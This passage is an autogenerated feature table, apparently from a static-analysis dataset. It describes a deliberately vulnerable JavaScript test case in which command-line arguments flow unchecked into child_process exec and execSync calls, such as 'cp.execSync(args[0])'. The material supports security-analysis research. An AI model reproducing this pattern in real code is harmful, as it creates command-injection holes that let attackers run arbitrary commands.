autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:9 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:9 | args | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:9 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:9 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args = ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args = ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args = ... lice(2) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args = ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:6:10:33 | args = ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:19 | process | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:19 | process | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:19 | process | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:19 | process | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:19 | process | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:24 | process.argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:24 | process.argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:24 | process.argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:24 | process.argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:24 | process.argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:30 | process.argv.slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:30 | process.argv.slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:30 | process.argv.slice | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:30 | process.argv.slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:30 | process.argv.slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | exceptional return of process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | exceptional return of process ... lice(2) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | exceptional return of process ... lice(2) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | exceptional return of process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | exceptional return of process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:13:10:33 | process ... lice(2) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:21:10:24 | argv | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:21:10:24 | argv | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:21:10:24 | argv | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:21:10:24 | argv | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:21:10:24 | argv | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:26:10:30 | slice | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:26:10:30 | slice | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:26:10:30 | slice | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:26:10:30 | slice | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:26:10:30 | slice | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | CalleeFlexibleAccessPath | process.argv.slice | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:10:32:10:32 | 2 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:12 | cp.execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | cp.execSync(args[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | exceptional return of cp.execSync(args[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | exceptional return of cp.execSync(args[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | exceptional return of cp.execSync(args[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | exceptional return of cp.execSync(args[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:2:11:21 | exceptional return of cp.execSync(args[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:5:11:12 | execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:5:11:12 | execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:5:11:12 | execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:5:11:12 | execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:5:11:12 | execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:17 | args | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:17 | args | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:17 | args | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:17 | args | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:17 | args | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | CalleeFlexibleAccessPath | cp.execSync | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | InputArgumentIndex | 0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | calleeImports | child_process | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:14:11:20 | args[0] | receiverName | cp | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:19:11:19 | 0 | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:19:11:19 | 0 | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:19:11:19 | 0 | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:19:11:19 | 0 | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:11:19:11:19 | 0 | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:3 | cp | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:3 | cp | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:3 | cp | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:3 | cp | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:3 | cp | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:12 | cp.execSync | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:12 | cp.execSync | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:12 | cp.execSync | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:12 | cp.execSync | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:12 | cp.execSync | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) | contextSurroundingFunctionParameters | () | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs args slice 1 cp execSync fewerArgs 0 0 cp execSync cmd.sh fewerArgs 0 0 arg0 fewerArgs 0 0 cp execSync arg0 cp execSync cmd.sh arg0 | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) | enclosingFunctionName | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | cp.exec ... rgs[0]) | fileImports | arg argparse args child_process command-line-args commander dashdash get-them-args meow minimist optimist subarg yargs yargs-parser | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | exceptional return of cp.exec ... rgs[0]) | contextFunctionInterfaces | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | exceptional return of cp.exec ... rgs[0]) | contextSurroundingFunctionParameters | | +| autogenerated/ShellCommandInjectionFromEnvironment/IndirectCommandInjection/command-line-parameter-command-injection.js:12:2:12:33 | exceptional return of cp.exec ... rgs[0]) | enclosingFunctionBody | cp exec process argv cp exec process 0 argv 0 cp exec cmd.sh process 0 argv 0 cp exec cmd.sh process 1 argv 1 cp exec cmd.sh process 2 argv 2 args process argv slice 2 cp execSync args 0 0 cp execSync cmd.sh args 0 0 fewerArgs 